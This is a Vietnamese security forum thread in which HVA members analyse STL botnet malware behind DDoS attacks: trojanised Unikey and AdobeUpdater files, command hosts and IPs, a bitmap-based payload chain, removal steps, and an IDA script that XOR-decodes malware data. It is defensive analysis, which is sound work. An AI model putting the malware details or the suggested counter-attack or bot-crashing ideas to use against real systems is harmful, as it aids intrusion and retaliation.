He he, sáng nay grep awk sed mớ logs thì thấy các bạn STL "thử" lung tung ;). Công nhận secure website để kiddies không phá phách bậy bạ thì không khó nhưng secure website để khỏi bị DDoS kiểu "crawler" thì mệt thiệt. Cái "hiệu lệnh" xml của các bạn STL có những limitation (hoặc flaw) không nhỏ nhưng có điều, tớ chả rảnh để viết thêm một ký sự DDoS HVA cho nên các bạn tự mà phân tích những limitation ấy :-) . Ngay cả những con zombies cũng bị những limitation khác. Nếu webserver bị DDoS mà respond một dạng packet có nội dung nhất định nào đó thì có thể làm "teo" con zombie và teo máy chạy zombie (nhưng có lẽ các bạn không quan tâm mấy con zombies bị treo), các bạn chỉ quan tâm đến việc có zombies để phá hoại mà thôi, phải không nào? :-)

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:

http://www.symantec.com/connect/blogs/truth-behind-shady-rat

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

rang0 wrote:

Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat

kiểu mô tả này khá giống với googleCrashHandle trước đây, duy chỉ có điều không dùng steganography. file cấu hình hồi đó rất thô sơ, không xml

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

rang0 wrote:

Nhân bài báo cáo "Operation Shady RAT" của McAfee, phía Symantec cũng đưa ra một bản báo cáo, mà nếu đọc thì mọi người sẽ thấy nó cũng giống như những gì đang diễn ra ở HVA : Code:
http://www.symantec.com/connect/blogs/truth-behind-shady-rat

Tin tức trên viet.rfi.fr http://www.viet.rfi.fr/chau-a/20110804-tin-tac-trung-quoc-tan-cong-tu-my-den-viet-nam

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

THÔNG BÁO KẾT QUẢ KIỂM TRA THỰC TẾ CÁC MẪU VIRUS-TROJAN CỦA STL Như viết ở post trên, tôi đã thiết lập một server (loại nhỏ) riêng, chuyên dùng để kiểm tra các virus-trojan của STL. Server cài hai OS: WinXPSP3 và Win2K3SP2. Cách thức kiểm tra như sau: - Cài các mẫu virus mà bạn lequi, axasin, TQN và các bạn khác cung cấp vào server. - Disable on-access scan hay guard của các trình antivirus để virus không bị delete hay bị vô hiệu hoá khi khởi chạy. - Theo rõi Activities của virus thông qua firewall và sau đó áp dụng chế độ "Allow" hay "Trust this process", để không ngăn trở quá trình virus thâm nhập vào hệ thống - Kiểm tra việc virus thiết lập các file mới, tạo lập các directory mới trong hệ thống, xoá các registry cũ và tạo lập các registry mới hay thay đổi value của registry.... - Kiểm tra kỹ quá trình kết nối trên mạngdo virus tạo lập, các thông số của quá trình kết nối (port , TCP/UDP protocol, RX-TX....) , địa chỉ IP và host name-domain của destination (mục tiêu kết nối)... - Phân tích các gói tin (packet) của quá trình kết nối này - Check thẳng vào các master webserver-website để có thêm thông tin.... Kết quả thì nhiều và cần được sắp xếp lại một cách hệ thống. Vì vậy tôi chỉ thông báo tóm tắt các kết quả sau. 1- File Unikey mà bạn lequi cung cấp (bạn cũng cho đó là malicios Unikey- nó có nhiệm vụ download từ mạng các malicious file MsHelpcenter.exe và MSHelpCenter.idx... về máy zombies) thưc ra không phải là một virus-trojan. Khi cho nhiễm vào máy, ngoài những file liên quan, không thấy xuất hiện các file lạ-nghi ngờ, các registry lạ và không tạo ra bất cứ kết nốimang nào (theo rõi trong 2 ngày). Tôi nhớ dường như bạn range0 cũng đã có ý kiến ờ 1 post trong topic nay, xác định đây không phải là virus-trojan. Vậy thì thưc tế Unikey nào khác trên mạnghay một file khác mới là virus trojan của STL khi nhiễm vào máy sẽ khởi phát quá trình download các file MSHelpCenter.* hay các malicious khác về máy? 2- File AdobeUpdater.exe (do TQN cung cấp ngày 28-7-2011) đúng là một virus-trojan của STL. Khi cho nhiễm vào máy, virus này tạo lập một số file mới và directory trong hệ thống. Đồng thời AdobeUpdater.exe xoá môt số registry của hệ thống và thiết lập các registry mới, cần cho việc khởi chạy sau khi hệ thống được restart. Xem hình ảnh đính kèm. Ngay sau khi được kích hoạt AdobeUpdater.exe đã tạo một kết nối Internet đến đia chỉ IP: 193.106.175.68:80, đây chính là IP tĩnh của webserver second.dinest.net của STL, mà tôi đã kiểm tra và phân tích kỹ ở post trên. Điều này hoàn toàn phù hợp với kết luận của TQN và bạn acoustics89, công bố ở các post trên, trong topic này. Có hai điểm cần lưu ý thêm: - Khi đươc kích hoạt (click chuột vào AdobeUpdater.exe) thì lập tức AdobeUpdater.exe tạo ra một kết nôi đến second.dinest.net, như nói ở trên. Nhưng sau đó kết nối ngừng và không có file (data file hay image file) nào được download về máy. Có lẽ lúc này second.dinest.net tạm thời không cỏn đươc giao nhiêm vụ làm một master webserver-website nữa? Sau một lần kết nôi như vậy, trong liên tục 1 ngày sau đó, AdobeUpdater.exe không tự đông khởi tao một lần kết nối mạng nào khác nũa. - Thưc ra AdobeUpdater.exe đã bị Avira antivirus phát hiện ra ngay khi nó đươc copy từ một USB vào testing server của tôi hoặc khi giải nén nó trên server. Vì vậy nếu một user nào cài Avira antivirus (free edition) và up to date, thì AdobeUpdater.exe không thể nhiễm vào máy hay kích hoạt trong máy. McAfee Antivirus version 8.8 thì không phát hiện ra AdobeUpdater.exe, kể cả khi scan trực tiếp vào file Xin xem hình ảnh

Avira antivirus (guard enabled) phát hiện ra AdobeUpdater.exe ngay khi nó đang được copy vào máy

Be noted: Bác conmale ơi. Tôi đã resize các file ảnh upload để đạt chiều ngang nhỏ hơn 500pixels, như yêu cầu. Nhưng như vậy chữ trên hình quá nhỏ, rất khó đọc. Theo kinh nghiệm thưc tế của tôi, có thể upload file hình ảnh có chiều ngang lên tới 750, thậm chí 800 pixels vẫn không có vấn đề gì, khung hình forum không hề bị phá vỡ. vÌ vậy nên hạn chế max là 800 pixels, thay vì 500 pixels. Mong bác xem lại. Cam ơn

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

@anh Conmale: Có cách nào dùng gậy ông đập lưng ông không, chứ chả lẽ chịu trận mãi thế này khó chịu thật. Ngoài phân tích và update cho các AV thì cũng phải đập lại cho tơi bời chứ!?

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

Vanxuanemp wrote:

@anh Conmale: Có cách nào dùng gậy ông đập lưng ông không, chứ chả lẽ chịu trận mãi thế này khó chịu thật. Ngoài phân tích và update cho các AV thì cũng phải đập lại cho tơi bời chứ!?

Đâu cần làm vậy bạn, nếu muốn làm vậy thì các anh ý đã làm lâu rồi. Anh em member chia sẻ thông cảm cho sự vất vả của các anh admin và các anh RCE qua đó học hỏi các anh ý. Chứ còn mình ko hèn như STL phải không bạn. :d

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mình mà DDOS đập lại các server đó thì CA Vietnam ta còng đầu tụi mình liền đấy, đừng dại ! Chỉ có tụi nó được quyền DDOS thôi, anh em có hiểu không ha ? ;) 2 kết quả phân tích của Avira: 1. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=792743 2. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=796552 Tự dưng bây giờ em khoái Avira quá, submit mẫu nào là "mèo què" mẫu đấy, còn ông nội KIS em đang dùng thì tới giờ nhét nguyên cái thư mục Virus vào miệng nó, nó cứ bảo clean. Đã vậy sáng nay update xong, nó kêu em nên nhả cái file AcrobatUpdater.exe từ Quarranty ra nữa chứ. Bó tay luôn. Bỏ công submit cho KIS nhiều hơn mới tức chứ. Nhưng thôi, em còn tiếc 370 ngàn, còn hơn mười tháng nữa, ráng xài cho hết, tiết kiệm, thời buổi lạm phát, khó khăn, hỗn loạn mà ....!!!???

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

acoustics89 wrote:

Bây giờ chưa có mẫu mới hả anh, vẫn cái kia nó dos, lại còn post dòng này, bực quá. Code:
mà tên em dễ viết như thế mà anh TQN lúc thì accxxxx ( chắc đang nghĩ đến từ account ) lúc thì acourxxx :|

Mấy cái này thằng này không hiểu sao mà suốt ngày Postmodernism =)). Chúng nó nên chuyển từ "Postder" sang "Commu". lol. Chắc mình phải lập 2pic báo mình là Postdernism. cái truyện cách đây 1 năm mà suốt ngày lôi ra :-< tiểu nhân ...

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Vanxuanemp wrote:

@anh Conmale: Có cách nào dùng gậy ông đập lưng ông không, chứ chả lẽ chịu trận mãi thế này khó chịu thật. Ngoài phân tích và update cho các AV thì cũng phải đập lại cho tơi bời chứ!?

Hì hì, đập lại thì không khó nhưng làm như vậy thì có khác gì bọn họ đâu em? Ở một góc độ nào đó, anh cũng cám ơn họ đã tạo điều kiện để táy máy thêm và tìm cách kiện toàn + tối ưu hệ thống. Trong quá trình làm, anh cũng học thêm được nhiều điều bổ ích và lý thú. Đặc biệt cảm ơn các anh em kỹ thuật trực tiếp tham gia và các anh em không trực tiếp tham gia kỹ thuật đã động viên, hỗ trợ mọi mặt. Bọn họ đang chơi một trò chơi tồi tệ và tự đẩy mình càng lúc càng xa và đó chính là chiêu "tự đập" vậy :-) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

Giờ này có lẽ HVA vẫn đang bị ddos anh Conmale nhỉ, em mới check lại cái second.dinest.net thì thấy đã trỏ sang 1 IP khác là 46.166.147.48 ở Ru.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranvanminh — GMT

Mỗi lần HVA gặp nạn là chạy ra một đống anh em, chiến hữu rút đao tương trợ. HVA nên bị DDOS nhiều thì mới nhộn nhịp, xôm tụ được. (mình không nói nhảm nha, mình đang phân tích tính chất vài trận DDoS HVA vừa qua à ) :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Em công nhận mấy anh stl giàu thiệt nha, lại nhiều quân nữa nha ! Chắc nước nào cũng có quân nằm vùng của mấy anh phải không ? Ngày hôm nay, anh lại cho cái host speed.cyline.org sống lại à ! Hệ thống tracker của em chụp liền à. File flower.bmp và plxzyin0fx.bmp của mấy anh lại thay đổi nữa rồi. Thử xem sao ? À, uxtheme.manifest sẽ download flower.bmp về từ cái speed.cyline.org, rồi uxtheme.manifest decode flower.bmp ra URL của plxzyin0fx.bmp plxzyin0fx.bmp lần này khác trước, sau khi được giải mã, nó sẽ extract ra máy của victim thành 2 file: 1. TeamViewer_Desktop.exe 2. themeui.manifest Bà con nào thấy có 2 file này trên máy thì chắc chắn máy bà con vẫn còn uxtheme.manifest và TeamViewer.exe giả mạo. Xin vui lòng kill & del tất cả 4 file trên giùm ! Em nghĩ là mấy anh nên cho cái host speed.cyline.org giải nghệ, về hưu cho rồi. Còn tiếc gì nó nữa ha !

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

trycatch wrote:

Giờ này có lẽ HVA vẫn đang bị ddos anh Conmale nhỉ, em mới check lại cái second.dinest.net thì thấy đã trỏ sang 1 IP khác là 46.166.147.48 ở Ru.

truy cập thử vào http://second.dinest.net/ nó hiện lên trang có 3 chữ lạnh lùng vãi: WTF =)) =)) =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

WTF = "What the fuck" hay "What the fun" ha ! Mệt mấy anh stl quá, làm em phải bò đi gấu gồ nữa. Mấy anh biết em dốt "In lít" mà !

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mới nói cái flower.bmp và plxzyin0fx.bmp có 1 câu mà mấy anh vội vàng modify 2 file này bằng một mớ 00 bytes à, mấy anh stl. Mấy anh ngồi trực topic này cũng mệt ha ! Giờ em đi chơi đã, đợi tracker của em báo mấy anh vừa change cái gì trong 2 file này. Tracker code = "đen phi" của em thừa thông minh để biết mấy anh modify cái gì mà ! Xem thường thằng em này quá mấy anh "sống chết theo lệnh", "sờ ti lợn"... ơi ! Em nói rồi, shutdown cái speed.cyline.org được rồi mà ! Biết mấy anh cũng căm mấy anh em HVA lắm, nhưng làm gì được ha ! Ai biểu mấy anh cứ phải trốn chui, trốn nhủi trong bóng tối không dám ra mặt, vỗ ngực xưng tên ha ! PS: Trong team mấy anh có một thằng coder code C++, STL khá lắm đấy, em cũng khen là giỏi. Nhưng nhắn với nó đừng đi ăn cắp, bê nguyên xi code từ mấy open source nữa nhé ! Em là em biết hết đấy ! Với lại nhắn với nó, code cho thống nhất, WinAPI thì WinAPI hết, pure C, pure Sock API thì pure Sock API hết, code "nửa mùa", chắp vá vậy, em khó chịu lắm, em vừa "rờ xxx em" vừa chửi thằng đó đấy ! Mấy anh không tin, hỏi thằng đó có phải thằng code GoogleCrashHandler với một đống "mèo què" dùng string của Standard Template Libray không ? Trong team của mấy anh, chỉ có mình thằng này là rành về C++, còn mấy thằng khác cứ wchar_t wzBuf[Bự bà cố luôn] rồi memset, memcpy, lstrcpyw, lstrlenw... tá lã hết ! À mà quên, đố mấy anh stl nè: 3 ^ 5 ^ 7 = ?. Đừng chơi code mã hoá bằng kiểu đó nữa nhé, hay hỏi thằng coder đó nó có hiểu gì không mà cứ đi cắm cúi code xor encode kiểu đó. Em share cho mấy anh cái IDC script để decode 1 block of memory trong IDA luôn: Code:

static UIXorBlock()
{
    auto len = 0;
    auto value = 0;
    auto step = 0;

    auto eaStart = SelStart();
    if (BADADDR == eaStart)
    {
        eaStart = ScreenEA();
    }
    else
    {
        len = SelEnd() - eaStart;
    }

    eaStart = AskAddr(eaStart, "Enter the start address to xor");
    if (BADADDR == eaStart)
    {
        Message("Invalid address !\n");
        return;
    }

    len = AskLong(len, "Enter the count of bytes to xor");
    if (-1 == len)
    {
        Message("Invalid len of block !\n");
        return;
    }

    value = AskLong(0, "Enter the value to xor");
    if (-1 == value)
    {
        Message("Invalid xor value !\n");
        return;
    }

    step = AskLong(1, "Number of bytes for every step ?");
    if (step < 1)
    {
        Message("Invalid step !\n");
        return;
    }

    auto ea = eaStart;
    while (ea < eaStart + len)
    {
        if (1 == step)
        {
            PatchByte(ea, Byte(ea) ^ value);
        }
        else if (2 == step)
        {
            PatchWord(ea, Word(ea) ^ value);
        }
        else
        {
            PatchDword(ea, Dword(ea) ^ value);
        }

        ea = ea + step;
    }
}

Lần sau đừng có chơi mã hoá = Xor nữa nhé ! 2 anh em HVA: yên tâm, chỉ nói một nữa thôi, một nữa là bí mật. Với lại thông cảm, tiếng Anh em "cùi bắp" lắm, nên mấy cái msg trên chắc chắn là sai Vô ca bu la ry (vocabulary) (lúc trước bà cô tiếng Anh của em cứ phạt em hoài vì cái tội đọc tiếng Anh như tiếng Việt này) ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

conmale wrote:

He he, sáng nay grep awk sed mớ logs thì thấy các bạn STL "thử" lung tung ;). Công nhận secure website để kiddies không phá phách bậy bạ thì không khó nhưng secure website để khỏi bị DDoS kiểu "crawler" thì mệt thiệt. Cái "hiệu lệnh" xml của các bạn STL có những limitation (hoặc flaw) không nhỏ nhưng có điều, tớ chả rảnh để viết thêm một ký sự DDoS HVA cho nên các bạn tự mà phân tích những limitation ấy :-) . Ngay cả những con zombies cũng bị những limitation khác. Nếu webserver bị DDoS mà respond một dạng packet có nội dung nhất định nào đó thì có thể làm "teo" con zombie và teo máy chạy zombie (nhưng có lẽ các bạn không quan tâm mấy con zombies bị treo), các bạn chỉ quan tâm đến việc có zombies để phá hoại mà thôi, phải không nào? :-)

Ý anh là: No Response 204, Not found 404, Service temporarily overloaded 502, ... để đánh lừa bot hay anh làm "crash" nó ? Bật mí được không anh ;) ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tụi stl code bot ồ ạt mà quên nguyên tắc "secure coding", muốn làm bot crash thì dể lắm đấy .lht. à ! Nhưng máy của victim crash chứ có phải máy tụi nó đâu, nên tụi nó "đông ke" !

Phân tích tính chất vài trận DDoS HVA vừa qua.

.lht. — GMT

TQN wrote:

Tụi stl code bot ồ ạt mà quên nguyên tắc "secure coding", muốn làm bot crash thì dể lắm đấy .lht. à ! Nhưng máy của victim crash chứ có phải máy tụi nó đâu, nên tụi nó "đông ke" !

Ohm ... Chắc lại sơ hở phần đọc reponse trả về dẫn đến crash dạng bufferflow và treo luôn máy :))

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 tranvanmin: Phân tích tính chất của mấy đợt DDOS vừa rồi thì chưa đâu. Xong hết rồi mới có, giờ thì chỉ tán phét thôi ;) Mình gặp tvm một lần rồi, hy vọng anh em, bạn bè tvm không có ai đang làm cho stl. Nếu có thì mai mốt gặp nhau đi nhậu "khó" nói chuyện lắm !

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

Không biết có phải em lo xa không mà hôm nay vừa đọc xong bài viết của các anh, em liền test thằng Unikey Vista em đang dùng. Kết quả scan trên virusTotal ra là 1/40 nhưng không biết có phải có em bé không. Các anh xem qua giúp em: UnikeyVista:(1/40) http://www.virustotal.com/file-scan/report.html?id=e77ce23ccf401273cb01233d0f63600a4efcfce9576f66c2b20dfa85ec9d95b7-1312684524 unikey40RC2-1101-win32.zip (Bản này download ở trang chủ Unikey.org): (3/40) có trojan) http://www.virustotal.com/file-scan/report.html?id=eaff3879e980449f844bddd84a85375f013d11527af6b1dbc7c9e858dd7034e6-1312685430 Kiểu này thì em biết xài bộ gõ nào đây?

Phân tích tính chất vài trận DDoS HVA vừa qua.

tanviet12 — GMT

Bản tải link nào chứ mình download trên Unikey.org và scan bằng virustotal đâu phát hiện "mèo què" hay '"tròi gián" nào đâu. Kết quả: http://www.virustotal.com/file-scan/report.html?id=aba5c0bff0442597ff8743b4fe7d28de945b78be01eb88fc4a95cadd1fbee409-1312691552

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

tanviet12 wrote:

Bản tải link nào chứ mình download trên Unikey.org và scan bằng virustotal đâu phát hiện "mèo què" hay '"tròi gián" nào đâu. Kết quả: http://www.virustotal.com/file-scan/report.html?id=aba5c0bff0442597ff8743b4fe7d28de945b78be01eb88fc4a95cadd1fbee409-1312691552

Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Vanxuanemp — GMT

whitesnow19 wrote:

Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử.

Chưa bao giờ có bản Unikey Vista cả, bạn hãy vào trực tiếp trang Unikey.org down lại nhé. Bản Unikey Vista là bản mod lại từ code của Unikey 3.6 (hoặc nếu không nhầm thì còn cũ hơn). Đừng là người tiếp tay cho STL khi không bao giờ down soft từ chính homepage!

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

Vanxuanemp wrote:

whitesnow19 wrote:

Hix.Mình quên nói rõ là bản này mình tải lâu rồi, gần 3 tháng rồi. Nhưng chắc chắn là mình đã tải ở Unikey.org. Chắc có lẽ bên đó đã update bản mới. Mình không biết đây có phải là STL không nên mình cứ up lên cho các anh test xem thử.
Chưa bao giờ có bản Unikey Vista cả, bạn hãy vào trực tiếp trang Unikey.org down lại nhé. Bản Unikey Vista là bản mod lại từ code của Unikey 3.6 (hoặc nếu không nhầm thì còn cũ hơn). Đừng là người tiếp tay cho STL khi không bao giờ down soft từ chính homepage!

Xin lỗi bạn nhé! Có vẻ như bạn chưa đọc kỹ bài viết của mình. Trong bài viết ghi rõ là mình tải bản Unikey4RC tại trang chủ. Trong phần comment trên mình chỉ giải thích cho bạn trên hiểu là bản đó mình đã tải lâu rồi. Chỉ vì muốn nhờ các anh giúp phân tích xem thử có phải virus STL nên mình mới post lên đây. Có gì không phải bạn bỏ qua nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@whitesnow19 Mình vừa download unikey40RC2-1101-win32.zip ở Unikey.org về và đây là phân tích của virustotal http://www.virustotal.com/file-scan/report.html?id=cf352e5e66bc33d170d42a67daa88c0b0a3f8de74fcbc8d2943c031234b7a826-1312706045 PS : check md5 của 2 file khác nhau hoàn toàn, như vậy file của bạn đã bị sửa. Có thể máy của bạn đã nhiễm virus hoặc giả là có người add virus vào file unikey40RC2-1101-win32.zip của bạn :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

whitesnow19 wrote:

Không biết có phải em lo xa không mà hôm nay vừa đọc xong bài viết của các anh, em liền test thằng Unikey Vista em đang dùng. Kết quả scan trên virusTotal ra là 1/40 nhưng không biết có phải có em bé không. Các anh xem qua giúp em:

whitesnow19 wrote:

Xin lỗi bạn nhé! Có vẻ như bạn chưa đọc kỹ bài viết của mình. Trong bài viết ghi rõ là mình tải bản Unikey4RC tại trang chủ. Trong phần comment trên mình chỉ giải thích cho bạn trên hiểu là bản đó mình đã tải lâu rồi. Chỉ vì muốn nhờ các anh giúp phân tích xem thử có phải virus STL nên mình mới post lên đây. Có gì không phải bạn bỏ qua nhé [/qoute] Có mâu thuẩn gì ở đây không??

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mấy anh stl học lại kỹ thuật code dùng zlib đi nhé ! Em khuyên thành thật ấy. Dùng zlib từ đó tới giờ mà không biết cách uncompress trên memory à ? Ai lại đi chơi lấy buffer zip ghi vào temp file rồi dùng hàm của zlib uncompress, rồi lại ghi vào temp file khác, rồi lại đọc lên. Lúc em RCE, em nói quái, sao đi lòng vòng vầy nè ? Cuối cùng "thì ra em đã hiểu", mấy anh chỉ biết dùng mấy hàm zlib cho file thôi ! Cho em rút lại lời khen thằng coder C++ của mấy anh nhé, code vầy tệ lắm. Gặp em là team leader của nó thì em sạc nó thẵng tay rồi. PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

TQN wrote:

PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ?

Em tự hỏi, blogspot của Google thì làm sao mà stl "đốt" nổi , mà "đốt" mãi thế?

Phân tích tính chất vài trận DDoS HVA vừa qua.

sourcefire — GMT

hic hôm nay đọc được bài này, kiểm tra lại file unikey của mình và download lại từ trên trang chủ về thì thấy dung lượng khác nhau, kiểm tra trên virustotal thì được report thế này, không biết có phải của STL không nữa: http://www.virustotal.com/file-scan/report.html?id=9852b3c19f9cca4aa35c16f2cc54911a54c0aa7d13d232fa5adb6a62918260dc-1312720738 Đây là nguyên mẫu file unikey, nhờ các bạn kiểm tra xem phải của STL không? http://www.megaupload.com/?d=FLM02K3G File này mình nhớ là trước đây cũng down từ trang chủ unikey, nhưng không biết là có phải thực sự bị dính STL không nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

http://www.virustotal.com/file-scan/report.html?id=20b7db27d61f14e8bd31d66971e20737d0a9287308b69eeb6f04bab6970015c9-1312701296 Thấy mấy bác quét unikey cũng quét thử cái nhưng sao toàn virut gì không biết nữa . Đang cài kis 2012 + Quảng Nổ bản quyền

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

crc32 wrote:

TQN wrote:

PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ?
Em tự hỏi, blogspot của Google thì làm sao mà stl "đốt" nổi , mà "đốt" mãi thế?

Đến Google MJ nó còn Đốt cho đơ gần 1 ngày liền, huống chi là blogspot của Google. tiếc là sờ ti lợn chưa đủ trình và tiếng thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

2 ivanst: Unikey của bạn dính "mèo què" của stl rồi. May là cái đám bot này đã cũ và các host ra lệnh của nó không còn tồn tại nữa. Cậu search thư mục BackupUtility, kill process BackupSvc.exe, xong xoá hết các file sau: 1. BackupSvc.exe 2. DbCompact.exe 3. DbEntry1.idx, DbEntry2.idx, DbEntry3.idx Xong vào registry, search "BackupSvc", xoá các key và value đó đi. Khởi động lại máy, lên homepage của Unikey mà down về.

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

Thank pác TQN đã hỗ trợ . Nhưng mà em search trong WIN + regedit ko có các từ mà pác bảo + process . Bản unikey này em lấy từ file ghost của gostep về . Em thấy unikey ghi ngày 19/4/2006 - Ghost là 29/7/2009 . Chắc tại em xài w7 nên nó ko support nên search ko ra . Nếu nó đã là hàng cũ thì * BK pro + KIS bỏ qua cho nó ???

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

setup unikey của mình : http://www.mediafire.com/?3xbcbcy99w39h49 quét thử bằng vr total thì báo tới 6 lận???? mình đang dùng avira( update thường xuyên, đã thử cài KIS + CMC mấy hôm trước quét cũng không thấy báo gì) + comodo firewall không thấy có biểu hiện bất thường gì cả. Chẳng lẽ trong unikey mấy bác nhà ta có sử dụng tới lib nào mà AV nhận diện nhầm, mình thỉnh thoảng cũng bị trường hợp này. :(

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

còn đây là bản unikey mới nhất trên trang chủ http://www.virustotal.com/file-scan/report.html?id=cf8773ccfb08010e71134d2096831afd37d52113f402daac90ea717900fc2f8a-1312767260 Khả năng dự đoán của mình là đúng. Quả này thì "khó" rồi

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

mylove14129 wrote:

còn đây là bản unikey mới nhất trên trang chủ http://www.virustotal.com/file-scan/report.html?id=cf8773ccfb08010e71134d2096831afd37d52113f402daac90ea717900fc2f8a-1312767260 Khả năng dự đoán của mình là đúng. Quả này thì "khó" rồi

Ở trên trang chủ của UniKey ( unikey.org ) không có file nào là Uk40BSetup.exe, chỉ có ver 3 mới có file setup ( .exe ) còn ver 4 chỉ là file zip mà thôi. không biết bro lấy từ trang chủ nào ? PS : Xin mấy bro đừng chém gió tránh loãng chủ đề !!!

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hôm qua có anh bạn ghé thăm làm vài chai. Anh ấy hỏi tại sao hiện tượng DDoS rộng lớn và dai dẳng xảy ra như vậy mà các cơ quan hữu trách vẫn hoàn toàn im lặng? Tớ đớ lưỡi, không trả lời được câu hỏi này. Đây cũng là câu hỏi TQN và nhiều member đã lặp đi lặp lại nhiều lần. Hiện nay đám STL vẫn tiếp tục hì hụi tạo botnet khác và vẫn loay hoay với những biến thái mới cho con zombie đã có sẵn trong các máy con bị nhiễm malware. Ở Việt Nam có bao nhiêu nhóm kỹ thuật, có bao nhiêu cơ quan hữu trách, có bao nhiêu người dùng biết đến tình trạng này? Cách đây không lâu, vietnamnet bị tấn công dai dẳng và rồi mọi chuyện chìm lỉm. Tại sao? Chẳng lẽ không có ai biết được hoặc không có khả năng truy tìm và chấm dứt những hoạt động phi pháp này hay sao? HVA đã đưa ra quá nhiều bằng chứng và thông tin cần thiết, việc còn lại đối với các cơ quan hữu trách có lẽ chẳng phải là việc khó khăn gì (ngoại trừ không muốn làm hoặc vì lý do nào khác thì không cần phải bàn).

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

mv1098 wrote:

mylove14129 wrote:

còn đây là bản unikey mới nhất trên trang chủ http://www.virustotal.com/file-scan/report.html?id=cf8773ccfb08010e71134d2096831afd37d52113f402daac90ea717900fc2f8a-1312767260 Khả năng dự đoán của mình là đúng. Quả này thì "khó" rồi
Ở trên trang chủ của UniKey ( unikey.org ) không có file nào là Uk40BSetup.exe, chỉ có ver 3 mới có file setup ( .exe ) còn ver 4 chỉ là file zip mà thôi. không biết bro lấy từ trang chủ nào ? PS : Xin mấy bro đừng chém gió tránh loãng chủ đề !!!

Mình vừa down từ trang chủ đó http://www.unikey.org/. click vào Download UniKey 4.0 here link sang forum của unikey http://www.unikey.org/forum/viewtopic.php?t=1541, bấm vào cái UniKey 4.0 Standard Setup, for all Windows rồi chờ down từ source force nhé P/S to mv1098 : nếu PS trên của bạn dành cho mình thì bạn nên tìm hiểu kỹ trước khi cm lại cho người khác.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

"Cập nhật ngày 17.1.2006: Đã có bản Beta 2 tại đây " Đây là bản beta từ năm 2006 mà bạn nói là ver mới nhất. bạn chỉ biết download về nhưng bạn cũng không thèm đọc hay sao ý. Ver mới nhất là UniKey 4.0 RC2

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

@all: e thấy bác conmale bảo Symantec chưa update mấy mẫu bác ý gửi. Em vào trang chủ Symantec check thì có vẻ vẫn chưa update, mà công ty thì xài SEPM :( Có cách nào để thằng Symantec sớm tỉnh ngộ ko các bác nhỉ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

angel_of_devil wrote:

@all: e thấy bác conmale bảo Symantec chưa update mấy mẫu bác ý gửi. Em vào trang chủ Symantec check thì có vẻ vẫn chưa update, mà công ty thì xài SEPM :( Có cách nào để thằng Symantec sớm tỉnh ngộ ko các bác nhỉ?

